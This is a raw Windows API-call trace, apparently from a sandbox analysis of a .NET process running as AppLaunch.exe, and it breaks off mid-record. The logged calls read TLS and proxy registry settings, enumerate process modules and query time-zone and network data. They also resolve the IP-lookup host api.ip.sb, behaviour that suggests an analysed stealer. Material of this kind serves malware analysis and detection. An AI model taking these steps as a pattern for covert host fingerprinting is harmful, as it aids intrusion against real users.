RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x43ea7c | out: phkResult=0x43ea7c*=0x278) returned 0x0 [0258.746] RegQueryValueExW (in: hKey=0x278, lpValueName="SchUseStrongCrypto", lpReserved=0x0, lpType=0x43ea98, lpData=0x0, lpcbData=0x43ea94*=0x0 | out: lpType=0x43ea98*=0x0, lpData=0x0, lpcbData=0x43ea94*=0x0) returned 0x2 [0258.746] RegCloseKey (hKey=0x278) returned 0x0 [0258.746] GetCurrentProcessId () returned 0xfc8 [0258.747] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xfc8) returned 0x278 [0258.747] EnumProcessModules (in: hProcess=0x278, lphModule=0x26cb39c, cb=0x100, lpcbNeeded=0x43ea80 | out: lphModule=0x26cb39c, lpcbNeeded=0x43ea80) returned 1 [0258.748] GetModuleInformation (in: hProcess=0x278, hModule=0x70000, lpmodinfo=0x26cb4dc, cb=0xc | out: lpmodinfo=0x26cb4dc*(lpBaseOfDll=0x70000, SizeOfImage=0x20000, EntryPoint=0x891a6)) returned 1 [0258.748] CoTaskMemAlloc (cb=0x804) returned 0x561db0 [0258.748] GetModuleBaseNameW (in: hProcess=0x278, hModule=0x70000, lpBaseName=0x561db0, nSize=0x800 | out: lpBaseName="AppLaunch.exe") returned 0xd [0258.748] CoTaskMemFree (pv=0x561db0) [0258.749] CoTaskMemAlloc (cb=0x804) returned 0x561db0 [0258.749] GetModuleFileNameExW (in: hProcess=0x278, hModule=0x70000, lpFilename=0x561db0, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\applaunch.exe")) returned 0x3b [0258.749] CoTaskMemFree (pv=0x561db0) [0258.749] CloseHandle (hObject=0x278) returned 1 [0258.749] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe", nBufferLength=0x105, lpBuffer=0x43e5a8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe", lpFilePart=0x0) returned 0x3b [0258.749] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\System.Net.ServicePointManager.SchSendAuxRecord", ulOptions=0x0, samDesired=0x20019, phkResult=0x43ea78 | out: phkResult=0x43ea78*=0x0) returned 0x2 [0258.750] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x43ea78 | out: phkResult=0x43ea78*=0x278) returned 0x0 [0258.750] RegQueryValueExW (in: hKey=0x278, lpValueName="SchSendAuxRecord", lpReserved=0x0, lpType=0x43ea94, lpData=0x0, lpcbData=0x43ea90*=0x0 | out: lpType=0x43ea94*=0x0, lpData=0x0, lpcbData=0x43ea90*=0x0) returned 0x2 [0258.750] RegCloseKey (hKey=0x278) returned 0x0 [0258.751] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x43ea7c | out: phkResult=0x43ea7c*=0x278) returned 0x0 [0258.751] RegQueryValueExW (in: hKey=0x278, lpValueName="SystemDefaultTlsVersions", lpReserved=0x0, lpType=0x43ea98, lpData=0x0, lpcbData=0x43ea94*=0x0 | out: lpType=0x43ea98*=0x0, lpData=0x0, lpcbData=0x43ea94*=0x0) returned 0x2 [0258.751] RegCloseKey (hKey=0x278) returned 0x0 [0258.752] GetCurrentProcessId () returned 0xfc8 [0258.752] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xfc8) returned 0x278 [0258.752] EnumProcessModules (in: hProcess=0x278, lphModule=0x26ce1a8, cb=0x100, lpcbNeeded=0x43ea80 | out: lphModule=0x26ce1a8, lpcbNeeded=0x43ea80) returned 1 [0258.754] GetModuleInformation (in: hProcess=0x278, hModule=0x70000, lpmodinfo=0x26ce2e8, cb=0xc | out: lpmodinfo=0x26ce2e8*(lpBaseOfDll=0x70000, SizeOfImage=0x20000, EntryPoint=0x891a6)) returned 1 [0258.754] CoTaskMemAlloc (cb=0x804) returned 0x561db0 [0258.754] GetModuleBaseNameW (in: hProcess=0x278, hModule=0x70000, lpBaseName=0x561db0, nSize=0x800 | out: lpBaseName="AppLaunch.exe") returned 0xd [0258.754] CoTaskMemFree (pv=0x561db0) [0258.754] CoTaskMemAlloc (cb=0x804) returned 0x561db0 [0258.755] GetModuleFileNameExW (in: hProcess=0x278, hModule=0x70000, lpFilename=0x561db0, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\applaunch.exe")) returned 0x3b [0258.755] CoTaskMemFree (pv=0x561db0) [0258.755] CloseHandle (hObject=0x278) returned 1 [0258.755] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe", nBufferLength=0x105, lpBuffer=0x43e5a8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe", lpFilePart=0x0) returned 0x3b [0258.756] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\System.Net.ServicePointManager.RequireCertificateEKUs", ulOptions=0x0, samDesired=0x20019, phkResult=0x43ea78 | out: phkResult=0x43ea78*=0x0) returned 0x2 [0258.756] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x43ea78 | out: phkResult=0x43ea78*=0x278) returned 0x0 [0258.756] RegQueryValueExW (in: hKey=0x278, lpValueName="RequireCertificateEKUs", lpReserved=0x0, lpType=0x43ea94, lpData=0x0, lpcbData=0x43ea90*=0x0 | out: lpType=0x43ea94*=0x0, lpData=0x0, lpcbData=0x43ea90*=0x0) returned 0x2 [0258.756] RegCloseKey (hKey=0x278) returned 0x0 [0258.757] QueryPerformanceFrequency (in: lpFrequency=0x147328 | out: lpFrequency=0x147328*=100000000) returned 1 [0258.757] QueryPerformanceCounter (in: lpPerformanceCount=0x43eb84 | out: lpPerformanceCount=0x43eb84*=1202231526000) returned 1 [0258.760] GetCurrentProcess () returned 0xffffffff [0258.760] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x43e798 | out: TokenHandle=0x43e798*=0x278) returned 1 [0258.763] CloseHandle (hObject=0x278) returned 1 [0258.763] GetCurrentProcess () returned 0xffffffff [0258.763] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x43e7b0 | out: TokenHandle=0x43e7b0*=0x278) returned 1 [0258.764] CloseHandle (hObject=0x278) returned 1 [0258.769] GetCurrentProcess () returned 0xffffffff [0258.769] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x43ea68 | out: TokenHandle=0x43ea68*=0x278) returned 1 [0258.784] CoTaskMemAlloc (cb=0xcc0) returned 0x561db0 [0258.788] RasEnumConnectionsW (in: param_1=0x561db0, param_2=0x43ea78, param_3=0x43ea7c | out: param_1=0x561db0, param_2=0x43ea78, param_3=0x43ea7c) returned 0x0 [0258.800] CoTaskMemFree (pv=0x561db0) [0258.800] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x274 [0258.801] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x2a4 [0258.802] ioctlsocket (in: s=0x274, cmd=-2147195266, argp=0x43ea80 | out: argp=0x43ea80) returned 0 [0258.802] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x2a8 [0258.803] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x2ac [0258.803] ioctlsocket (in: s=0x2a8, cmd=-2147195266, argp=0x43ea80 | out: argp=0x43ea80) returned 0 [0258.804] WSAIoctl (in: s=0x274, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x43ea68, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x43ea68, lpOverlapped=0x0) returned -1 [0258.804] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x43e798, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0258.826] WSAEventSelect (s=0x274, hEventObject=0x2a4, lNetworkEvents=512) returned 0 [0258.827] WSAIoctl (in: s=0x2a8, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x43ea68, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x43ea68, lpOverlapped=0x0) returned -1 [0258.827] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x43e798, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0258.827] WSAEventSelect (s=0x2a8, hEventObject=0x2ac, lNetworkEvents=512) returned 0 [0258.828] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x2b4 [0258.828] RasConnectionNotificationW (param_1=0xffffffff, param_2=0x2b4, param_3=0x3) returned 0x0 [0258.882] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x43ea94 | out: phkResult=0x43ea94*=0x2cc) returned 0x0 [0258.883] RegOpenKeyExW (in: hKey=0x2cc, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x43ea48 | out: phkResult=0x43ea48*=0x2d0) returned 0x0 [0258.884] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x2d4 [0258.884] RegNotifyChangeKeyValue (hKey=0x2d0, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x2d4, fAsynchronous=1) returned 0x0 [0258.885] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x43ea4c | out: phkResult=0x43ea4c*=0x2d8) returned 0x0 [0258.908] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x2dc [0258.908] RegNotifyChangeKeyValue (hKey=0x2d8, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x2dc, fAsynchronous=1) returned 0x0 [0258.909] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x43ea4c | out: phkResult=0x43ea4c*=0x2e0) returned 0x0 [0258.910] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x2e4 [0258.910] RegNotifyChangeKeyValue (hKey=0x2e0, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x2e4, fAsynchronous=1) returned 0x0 [0258.911] GetCurrentProcess () returned 0xffffffff [0258.911] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x43ea3c | out: TokenHandle=0x43ea3c*=0x2e8) returned 1 [0258.916] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0x43e340 | out: phkResult=0x43e340*=0x2ec) returned 0x0 [0258.916] RegQueryValueExW (in: hKey=0x2ec, lpValueName="LegacyWPADSupport", lpReserved=0x0, lpType=0x43e35c, lpData=0x0, lpcbData=0x43e358*=0x0 | out: lpType=0x43e35c*=0x0, lpData=0x0, lpcbData=0x43e358*=0x0) returned 0x2 [0258.916] RegCloseKey (hKey=0x2ec) returned 0x0 [0258.935] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x533340 [0258.994] WinHttpSetTimeouts (hInternet=0x533340, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1 [0258.995] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x43ea48 | out: pProxyConfig=0x43ea48) returned 1 [0259.027] CloseHandle (hObject=0x278) returned 1 [0259.041] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.HttpWebRequest_Disabled", lpBuffer=0x43e280, nSize=0x9c | out: lpBuffer="") returned 0x0 [0259.042] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.HttpWebRequest_MinCount", lpBuffer=0x43e280, nSize=0x9c | out: lpBuffer="") returned 0x0 [0259.045] EtwEventRegister () returned 0x0 [0259.053] GetCurrentProcess () returned 0xffffffff [0259.053] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x43e760 | out: TokenHandle=0x43e760*=0x328) returned 1 [0259.057] CloseHandle (hObject=0x328) returned 1 [0259.057] GetCurrentProcess () returned 0xffffffff [0259.057] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x43e778 | out: TokenHandle=0x43e778*=0x328) returned 1 [0259.058] CloseHandle (hObject=0x328) returned 1 [0259.063] SetEvent (hEvent=0x26c) returned 1 [0259.129] GetCurrentProcess () returned 0xffffffff [0259.130] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x43e6e0 | out: TokenHandle=0x43e6e0*=0x338) returned 1 [0259.131] CloseHandle (hObject=0x338) returned 1 [0259.131] GetCurrentProcess () returned 0xffffffff [0259.131] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x43e6f8 | out: TokenHandle=0x43e6f8*=0x338) returned 1 [0259.132] CloseHandle (hObject=0x338) returned 1 [0259.135] GetTimeZoneInformation (in: lpTimeZoneInformation=0x43e8a8 | out: lpTimeZoneInformation=0x43e8a8) returned 0x1 [0259.158] GetDynamicTimeZoneInformation (in: pTimeZoneInformation=0x43e704 | out: pTimeZoneInformation=0x43e704) returned 0x1 [0259.201] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\W. Europe Standard Time", ulOptions=0x0, samDesired=0x20019, phkResult=0x43e7e8 | out: phkResult=0x43e7e8*=0x338) returned 0x0 [0259.202] RegQueryValueExW (in: hKey=0x338, lpValueName="TZI", lpReserved=0x0, lpType=0x43e804, lpData=0x0, lpcbData=0x43e800*=0x0 | out: lpType=0x43e804*=0x3, lpData=0x0, lpcbData=0x43e800*=0x2c) returned 0x0 [0259.202] RegQueryValueExW (in: hKey=0x338, lpValueName="TZI", lpReserved=0x0, lpType=0x43e804, lpData=0x26d75e0, lpcbData=0x43e800*=0x2c | out: lpType=0x43e804*=0x3, lpData=0x26d75e0*, lpcbData=0x43e800*=0x2c) returned 0x0 [0259.202] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\W. Europe Standard Time\\Dynamic DST", ulOptions=0x0, samDesired=0x20019, phkResult=0x43e63c | out: phkResult=0x43e63c*=0x0) returned 0x2 [0259.204] RegQueryValueExW (in: hKey=0x338, lpValueName="MUI_Display", lpReserved=0x0, lpType=0x43e7dc, lpData=0x0, lpcbData=0x43e7d8*=0x0 | out: lpType=0x43e7dc*=0x1, lpData=0x0, lpcbData=0x43e7d8*=0x20) returned 0x0 [0259.204] RegQueryValueExW (in: hKey=0x338, lpValueName="MUI_Display", lpReserved=0x0, lpType=0x43e7dc, lpData=0x26d7a04, lpcbData=0x43e7d8*=0x20 | out: lpType=0x43e7dc*=0x1, lpData="@tzres.dll,-320", lpcbData=0x43e7d8*=0x20) returned 0x0 [0259.204] RegQueryValueExW (in: hKey=0x338, lpValueName="MUI_Std", lpReserved=0x0, lpType=0x43e7dc, lpData=0x0, lpcbData=0x43e7d8*=0x0 | out: lpType=0x43e7dc*=0x1, lpData=0x0, lpcbData=0x43e7d8*=0x20) returned 0x0 [0259.204] RegQueryValueExW (in: hKey=0x338, lpValueName="MUI_Std", lpReserved=0x0, lpType=0x43e7dc, lpData=0x26d7a5c, lpcbData=0x43e7d8*=0x20 | out: lpType=0x43e7dc*=0x1, lpData="@tzres.dll,-322", lpcbData=0x43e7d8*=0x20) returned 0x0 [0259.204] RegQueryValueExW (in: hKey=0x338, lpValueName="MUI_Dlt", lpReserved=0x0, lpType=0x43e7dc, lpData=0x0, lpcbData=0x43e7d8*=0x0 | out: lpType=0x43e7dc*=0x1, lpData=0x0, lpcbData=0x43e7d8*=0x20) returned 0x0 [0259.204] RegQueryValueExW (in: hKey=0x338, lpValueName="MUI_Dlt", lpReserved=0x0, lpType=0x43e7dc, lpData=0x26d7ab4, lpcbData=0x43e7d8*=0x20 | out: lpType=0x43e7dc*=0x1, lpData="@tzres.dll,-321", lpcbData=0x43e7d8*=0x20) returned 0x0 [0259.214] CoTaskMemAlloc (cb=0x20c) returned 0x5760b8 [0259.214] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x5760b8 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0259.217] CoTaskMemFree (pv=0x5760b8) [0259.217] CoTaskMemAlloc (cb=0x20c) returned 0x5760b8 [0259.217] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\Windows\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x43e7f8, pwszFileMUIPath=0x5760b8, pcchFileMUIPath=0x43e7fc, pululEnumerator=0x43e7f0 | out: pwszLanguage=0x0, pcchLanguage=0x43e7f8, pwszFileMUIPath="C:\\Windows\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x43e7fc, pululEnumerator=0x43e7f0) returned 1 [0259.222] CoTaskMemFree (pv=0x0) [0259.222] CoTaskMemFree (pv=0x5760b8) [0259.223] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x2a0001 [0259.227] CoTaskMemAlloc (cb=0x3ec) returned 0x5760b8 [0259.227] LoadStringW (in: hInstance=0x2a0001, uID=0x140, lpBuffer=0x5760b8, cchBufferMax=500 | out: lpBuffer="(UTC+01:00) Amsterdam, Berlin, Bern, Rome, Stockholm, Vienna") returned 0x3c [0259.227] CoTaskMemFree (pv=0x5760b8) [0259.227] FreeLibrary (hLibModule=0x2a0001) returned 1 [0259.228] CoTaskMemAlloc (cb=0x20c) returned 0x5760b8 [0259.228] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x5760b8 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0259.228] CoTaskMemFree (pv=0x5760b8) [0259.228] CoTaskMemAlloc (cb=0x20c) returned 0x5760b8 [0259.228] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\Windows\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x43e7f8, pwszFileMUIPath=0x5760b8, pcchFileMUIPath=0x43e7fc, pululEnumerator=0x43e7f0 | out: pwszLanguage=0x0, pcchLanguage=0x43e7f8, pwszFileMUIPath="C:\\Windows\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x43e7fc, pululEnumerator=0x43e7f0) returned 1 [0259.230] CoTaskMemFree (pv=0x0) [0259.230] CoTaskMemFree (pv=0x5760b8) [0259.231] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x2a0001 [0259.233] CoTaskMemAlloc (cb=0x3ec) returned 0x5760b8 [0259.233] LoadStringW (in: hInstance=0x2a0001, uID=0x142, lpBuffer=0x5760b8, cchBufferMax=500 | out: lpBuffer="W. Europe Standard Time") returned 0x17 [0259.233] CoTaskMemFree (pv=0x5760b8) [0259.233] FreeLibrary (hLibModule=0x2a0001) returned 1 [0259.234] CoTaskMemAlloc (cb=0x20c) returned 0x5760b8 [0259.234] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x5760b8 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0259.234] CoTaskMemFree (pv=0x5760b8) [0259.234] CoTaskMemAlloc (cb=0x20c) returned 0x5760b8 [0259.235] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\Windows\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x43e7f8, pwszFileMUIPath=0x5760b8, pcchFileMUIPath=0x43e7fc, pululEnumerator=0x43e7f0 | out: pwszLanguage=0x0, pcchLanguage=0x43e7f8, pwszFileMUIPath="C:\\Windows\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x43e7fc, pululEnumerator=0x43e7f0) returned 1 [0259.239] CoTaskMemFree (pv=0x0) [0259.239] CoTaskMemFree (pv=0x5760b8) [0259.239] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x2a0001 [0259.242] CoTaskMemAlloc (cb=0x3ec) returned 0x5760b8 [0259.242] LoadStringW (in: hInstance=0x2a0001, uID=0x141, lpBuffer=0x5760b8, cchBufferMax=500 | out: lpBuffer="W. Europe Daylight Time") returned 0x17 [0259.242] CoTaskMemFree (pv=0x5760b8) [0259.242] FreeLibrary (hLibModule=0x2a0001) returned 1 [0259.243] RegCloseKey (hKey=0x338) returned 0x0 [0259.244] SetEvent (hEvent=0x26c) returned 1 [0259.245] GetACP () returned 0x4e4 [0259.252] GetNetworkParams (in: pFixedInfo=0x0, pOutBufLen=0x43ea04 | out: pFixedInfo=0x0, pOutBufLen=0x43ea04) returned 0x6f [0259.271] LocalAlloc (uFlags=0x0, uBytes=0x248) returned 0x555590 [0259.271] GetNetworkParams (in: pFixedInfo=0x555590, pOutBufLen=0x43ea04 | out: pFixedInfo=0x555590, pOutBufLen=0x43ea04) returned 0x0 [0259.287] LocalFree (hMem=0x555590) returned 0x0 [0259.289] CoTaskMemAlloc (cb=0x20c) returned 0x561db0 [0259.289] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.Connection_Disabled", lpBuffer=0x561db0, nSize=0x104 | out: lpBuffer="") returned 0x0 [0259.289] CoTaskMemFree (pv=0x561db0) [0259.289] CoTaskMemAlloc (cb=0x20c) returned 0x561db0 [0259.289] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.Connection_MinCount", lpBuffer=0x561db0, nSize=0x104 | out: lpBuffer="") returned 0x0 [0259.290] CoTaskMemFree (pv=0x561db0) [0259.297] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x344 [0259.298] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x340 [0259.300] GetAddrInfoW (in: pNodeName="api.ip.sb", pServiceName=0x0, pHints=0x43e8e0*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x43e888 | out: ppResult=0x43e888*=0x567810*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="api.ip.sb.cdn.cloudflare.net", ai_addr=0x580da0*(sa_family=2, sin_port=0x0, sin_addr="104.26.13.31"), ai_next=0x567838*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x580dd0*(sa_family=2, sin_port=0x0, sin_addr="172.67.75.172"), ai_next=0x567860*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x580de8*(sa_family=2, sin_port=0x0, sin_addr="104.26.12.31"), ai_next=0x0)))) returned 0 [0259.349] FreeAddrInfoW (pAddrInfo=0x567810*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="api.ip.sb.cdn.cloudflare.net", ai_addr=0x580da0*(sa_family=2, sin_port=0x0, sin_addr="104.26.13.31"), ai_next=0x567838*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x580dd0*(sa_family=2, sin_port=0x0, sin_addr="172.67.75.172"), ai_next=0x567860*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x580de8*(sa_family=2, sin_port=0x0, sin_addr="104.26.12.31"), ai_next=0x0)))) [0259.349] GetAddrInfoW (in: pNodeName="api.ip.sb", pServiceName=0x0, pHints=0x43e8e0*(ai_flags=131072, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x43e888 | out: ppResult=0x43e888*=0x567838*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="api.ip.sb", ai_addr=0x580de8*(sa_family=2, sin_port=0x0, sin_addr="104.26.13.31"), ai_next=0x567810*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x580dd0*(sa_family=2, sin_port=0x0, sin_addr="172.67.75.172"), ai_next=0x567798*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x580da0*(sa_family=2, sin_port=0x0, sin_addr="104.26.12.31"), ai_next=0x0)))) returned 0 [0259.351] FreeAddrInfoW (pAddrInfo=0x567838*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="api.ip.sb", ai_addr=0x580de8*(sa_family=2, sin_port=0x0, sin_addr="104.26.13.31"), ai_next=0x567810*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x580dd0*(sa_family=2, sin_port=0x0, sin_addr="172.67.75.172"), ai_next=0x567798*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x580da0*(sa_family=2, sin_port=0x0, sin_addr="104.26.12.31"), ai_next=0x0)))) [0259.353] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x348 [0259.353] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x34c [0259.353] ioctlsocket (in: s=0x348, cmd=-2147195266, argp=0x43e8b8 | out: argp=0x43e8b8) returned 0 [0259.353] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x350 [0259.354] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x354 [0259.354] ioctlsocket (in: s=0x350, cmd=-2147195266, argp=0x43e8b8 | out: argp=0x43e8b8) returned 0 [0259.354] WSAIoctl (in: s=0x348, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x43e8a0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x43e8a0, lpOverlapped=0x0) returned -1 [0259.354] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x43e5d0, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0259.354] WSAEventSelect (s=0x348, hEventObject=0x34c, lNetworkEvents=512) returned 0 [0259.354] WSAIoctl (in: s=0x350, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x43e8a0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x43e8a0, lpOverlapped=0x0) returned -1 [0259.354] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x43e5d0, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0259.354] WSAEventSelect (s=0x350, hEventObject=0x354, lNetworkEvents=512) returned 0 [0259.355] 